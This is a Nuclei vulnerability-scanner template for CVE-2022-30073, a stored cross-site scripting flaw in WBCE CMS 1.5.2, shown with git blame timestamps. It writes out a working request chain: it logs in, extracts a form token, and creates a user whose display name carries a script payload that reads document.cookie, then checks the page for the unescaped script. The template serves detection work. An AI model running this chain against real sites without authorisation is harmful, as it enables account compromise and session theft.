nuclei-templates/cves/2022/CVE-2022-30073.yaml

67 lines
1.8 KiB
YAML
Raw Normal View History

2022-07-16 08:25:17 +00:00
id: CVE-2022-30073
info:
name: WBCE CMS v1.5.2 XSS Stored
author: arafatansari
severity: medium
description: |
WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.
reference:
- https://github.com/APTX-4879/CVE
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
metadata:
verified: true
2022-07-19 11:37:35 +00:00
tags: cve,cve2022,wbcecms,xss
2022-07-16 08:25:17 +00:00
requests:
2022-07-19 11:52:28 +00:00
- raw:
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
POST /admin/login/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-19 11:37:35 +00:00
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
POST /admin/users/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-19 11:37:35 +00:00
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
2022-07-16 08:25:17 +00:00
- |
2022-07-19 11:37:35 +00:00
GET /admin/users/index.php HTTP/1.1
2022-07-16 08:25:17 +00:00
Host: {{Hostname}}
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
extractors:
2022-07-19 11:52:28 +00:00
- type: regex
2022-07-16 08:25:17 +00:00
name: formtoken
part: body
group: 1
regex:
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
internal: true
2022-07-19 11:37:35 +00:00
cookie-reuse: true
2022-07-16 08:25:17 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-19 11:37:35 +00:00
- "<p><b><script>alert(document.cookie)</script>"
- "WBCECMS"
condition: and
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
- type: word
part: header
words:
- text/html
2022-07-19 11:52:28 +00:00
2022-07-16 08:25:17 +00:00
- type: status
status:
- 200